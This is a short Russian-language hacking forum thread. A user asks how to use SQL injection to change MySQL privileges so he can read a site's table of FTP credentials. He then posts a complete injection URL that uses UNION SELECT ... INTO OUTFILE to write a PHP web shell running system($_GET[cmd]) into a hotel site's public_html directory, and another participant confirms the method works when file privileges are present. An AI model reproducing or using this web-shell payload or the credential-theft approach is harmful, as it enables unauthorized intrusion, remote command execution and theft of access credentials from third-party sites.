Проблема с доступом к Sql БД

Я нашел таблицу для фтп доступа к сайту и у меня нет прав на ее прочтение. Есть же таблица User_privileges, можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection? Заранее спасибо

 

Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов

 

Мдам, спасибо =)

 

А вот, я правильно создаю шелл:

HTML:

http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE+'/users/hotels/public_html/shell.php'/*

 

Пи*дец, думай хоть немного когда пишешь.

Технически да, практически нет. Даже если для ремоут юзера разрешён update, то в субд mysql ничего не получится сделать, т.к. отсутствует поддержка подзапросов.

Ну если есть file_priv и файл создаётся, то правильно.

 

Нет там file_priv и файл не создается. Значит - не судьба =)